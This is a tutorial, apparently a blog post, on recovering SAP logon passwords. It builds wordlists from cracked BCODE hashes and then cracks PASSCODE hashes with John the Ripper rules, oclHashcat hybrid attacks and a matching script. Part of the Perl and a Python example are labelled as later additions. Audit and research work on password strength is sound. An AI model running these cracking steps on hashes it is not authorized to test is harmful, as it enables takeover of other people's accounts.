Cracking SAP passwords – cracking the PASSCODE

16-01-2015

From BCODE to PASSCODE

Once we have recovered a sufficient number of BCODE passwords with both John the Ripper and oclHashcat, we can move on to cracking the PASSCODE, which is the “real” password a user types to log on to the SAP system.

# cat found_sap_qla_bcode.txt >> sap_qla_bcode.pot
# vi sap_qla_bcode.pot
:%s/^.\{-}://g
:sort u
:w sap_qla_bcode.wrd
:q!

# john --pot=sap_qla_passcode.pot --session=sap_qla_passcode --format=sapg --encoding=utf8 -w=sap_qla_bcode.wrd sap_qla_passcode.hash
# john --pot=sap_qla_passcode.pot --session=sap_qla_passcode --format=sapg --encoding=utf8 -w=sap_qla_bcode.wrd --rules sap_qla_passcode.hash
# john --pot=sap_qla_passcode.pot --session=sap_qla_passcode --format=sapg --encoding=utf8 -w=sap_qla_bcode.wrd --rules=single-extra sap_qla_passcode.hash

We take the passwords already cracked in the BCODE format with john and oclHashcat and reuse them to build a wordlist, which we name sap_qla_bcode.wrd; we then run john again with the rule sets shown above against the hash file in the sapg format.

If, after these steps, the BCODE pot still contains passwords that do not appear in the PASSCODE pot, we can write a custom rule to complete the conversion:

# john --pot=sap_qla_passcode.pot --session=sap_qla_passcode --format=sapg --encoding=utf8 -w=sap_qla_bcode.wrd --rules=Bcode2Passcode sap_qla_passcode.hash

Every password that is still unmatched after this step is longer than 8 characters, so we have to continue with other rules, but only in append mode!

We extract from sap_qla_bcode.pot every password that does not exist in sap_qla_passcode.pot, apply the “Bcode2Passcode” john rule to it, and then append one character at a time until the complete password is found.

# cut -d'$' -f1 sap_qla_bcode.pot > bcode_found.txt
# cut -d'$' -f1 sap_qla_passcode.pot > passcode_found.txt
# mkdir notcracked
# for i in $( grep -Fx -f passcode_found.txt -v bcode_found.txt )
do
grep "^${i}[$]" sap_qla_bcode.pot | sed -e 's/^.*[^:]://g' | john --pipe --rules=Bcode2Passcode --stdout > notcracked/${i}.wrd
grep "^${i}:" sap_qla_passcode.hash | sed -e 's/^[^:]*://' > notcracked/${i}.oclhash
done
# for i in notcracked/*.oclhash
do
cudaHashcat64.bin --session=sap_qla_passcode -o found_sap_qla_passcode.txt -a 6 -m 7800 --remove ${i} ${i/.oclhash/.wrd} ?a?a
done

In this way we combine john rules, which give us a very complete wordlist, with the power of the oclHashcat hybrid attack. With the last command we are guaranteed to recover every password of 10 characters or fewer.

Having a wordlist with the first 8 characters, plus a per-user wordlist built ad hoc with all the possible combinations of those characters, we can guess the complete password either by continuing with john or by using an oclHashcat mask in the “hybrid” attack.

To finish the cracking process and extract the correct password for the right SAP client, we can use the following script (after collecting every password cracked by oclHashcat into the same pot):

#!/usr/bin/perl -w
# sappwdfound.pl
use strict;
use warnings;

if ($#ARGV != 1) {
    die("Usage: sappwdfound.pl hashfile potfile\n" .
        "hashfile format: USER:CLIENT:BCODE:PASSCODE\n" .
        "potfile format: USER\$HASH:PASSWORD\n");
}
open(HASH, $ARGV[0]) || die("Unable to open hashfile\n");
# The original listing ends here; the lookup below is reconstructed from the
# two file layouts given in the usage message.
open(POT, $ARGV[1]) || die("Unable to open potfile\n");
my %pw;    # "USER$HASH" -> cleartext password
while (<POT>) {
    chomp;
    my ($key, $pass) = split /:/, $_, 2;
    $pw{$key} = $pass if defined $pass;
}
while (<HASH>) {
    chomp;
    my ($user, $client, $bcode, $passcode) = split /:/;
    my $found = $pw{"$user\$$passcode"} // $pw{"$user\$$bcode"};
    print "$user:$client:$found\n" if defined $found;
}
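As an added example (not code from the original article), the same reconciliation in Python: it parses the pot layout USER$HASH:PASSWORD and the hash file layout USER:CLIENT:BCODE:PASSCODE, prints the recovered password per SAP client, and lists the accounts where only the BCODE is cracked, i.e. the users the loop above still has to handle. All file contents, user names and digests are constructed.

```python
# Added example, not code from the original article: the bookkeeping the
# article does with cut/grep and sappwdfound.pl, written as a parser for the
# two file layouts. User names and hex digests below are constructed.

def parse_pot(lines):
    """Pot layout (john/oclHashcat, sapb/sapg): USER$HASH:PASSWORD.
    Returns {(USER, HASH): password}. The digest is hex, so splitting on the
    last '$' keeps a '$' inside a user name from breaking the parse."""
    found = {}
    for line in lines:
        key, sep, password = line.rstrip("\n").partition(":")
        user, dollar, digest = key.rpartition("$")
        if sep and dollar:
            found[(user, digest)] = password
    return found

def reconcile(hash_lines, bcode_pot, passcode_pot):
    """Hash file layout: USER:CLIENT:BCODE:PASSCODE.
    resolved: {(USER, CLIENT): logon password} when the PASSCODE is cracked.
    pending: [(USER, CLIENT, bcode_password)] when only the BCODE, i.e. the
    8-character prefix, is known: the accounts still to be handled."""
    resolved, pending = {}, []
    for line in hash_lines:
        parts = line.rstrip("\n").split(":")
        if len(parts) != 4:
            continue
        user, client, bcode, passcode = parts
        if (user, passcode) in passcode_pot:
            resolved[(user, client)] = passcode_pot[(user, passcode)]
        elif (user, bcode) in bcode_pot:
            pending.append((user, client, bcode_pot[(user, bcode)]))
    return resolved, pending

# Constructed sample input (placeholder digests, not real SAP hashes).
BCODE_POT = ["ADMIN$" + "A" * 16 + ":SUMMER20", "JDOE$" + "B" * 16 + ":WELCOME1"]
PASSCODE_POT = ["ADMIN$" + "C" * 40 + ":Summer20"]
HASHFILE = ["ADMIN:000:" + "A" * 16 + ":" + "C" * 40,
            "ADMIN:100:" + "A" * 16 + ":" + "C" * 40,
            "JDOE:100:" + "B" * 16 + ":" + "D" * 40]

def report():
    """Print USER:CLIENT:PASSWORD per resolved account, flag the pending
    ones, and return both so the outcome can be checked programmatically."""
    resolved, pending = reconcile(HASHFILE, parse_pot(BCODE_POT), parse_pot(PASSCODE_POT))
    for (user, client), pw in sorted(resolved.items()):
        print(f"{user}:{client}:{pw}")
    for user, client, prefix in pending:
        print(f"{user}:{client}: only the 8-char BCODE prefix {prefix} is cracked")
    return resolved, pending
```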
